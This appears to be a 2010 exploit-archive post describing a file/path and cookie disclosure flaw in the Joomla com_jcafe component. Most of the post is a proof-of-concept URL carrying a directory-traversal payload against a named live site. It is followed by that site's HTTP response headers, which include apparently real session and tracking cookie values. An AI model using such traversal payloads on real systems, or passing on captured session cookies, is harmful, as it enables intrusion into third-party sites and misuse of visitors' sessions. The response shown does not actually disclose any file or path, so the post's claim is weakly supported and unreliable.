Joomla Component com_jcafe local File/Path / Cookie Disclosu
Posted on 26 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_jcafe local File/Path / Cookie Disclosure</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================== Joomla Component com_jcafe local File/Path / Cookie Disclosure ============================================================== There is a vulnerability in the Joomla com_jcafe which will show the File name, Path and Cookies. p0c : http://ver1.5.joomcafe.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../ O/P : HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 66356 Date: Fri, 25 Jun 2010 20:19:02 GMT Connection: close Set-Cookie: ASP.NET_SessionId=4kbyayajnq0p3hm33mbrtliu; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=c32f7324-b061-435b-9171-3d05e7f3b1dd; domain=cafepress.com; expires=Wed, 25-Jun-2110 20:19:02 GMT; path=/ Set-Cookie: cpv=dc9398ed-9d75-44a8-b3c9-bd82a820ecbc; domain=cafepress.com; expires=Wed, 25-Jun-2110 20:19:02 GMT; path=/ Set-Cookie: tfx_ltch=6%2cDIRECT%2c20100625131902%2c; domain=cafepress.com; expires=Sat, 26-Jun-2010 20:19:02 GMT; path=/ Set-Cookie: tfx_touch=6%2cDIRECT%2c20100625131902%2c; domain=cafepress.com; expires=Thu, 20-Jun-2030 20:19:02 GMT; path=/ Set-Cookie: cppid=8130179; domain=cafepress.com; expires=Fri, 02-Jul-2010 20:19:02 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Fri, 02-Jul-2010 20:19:02 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Fri, 02-Jul-2010 20:19:02 GMT; path=/ Set-Cookie: pid.guid=e231dd8e-45f5-4135-b623-88566dd5521e; domain=cafepress.com; expires=Mon, 22-Jun-2020 20:19:02 GMT; path=/ Set-Cookie: cp-v=3BB71A8B111CDC9BDEBC023FE4414B97; domain=cafepress.com; expires=Thu, 25-Jun-2020 20:19:02 GMT; path=/ Set-Cookie: cppss=1x2; domain=cafepress.com; path=/ Cache-Control: private # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
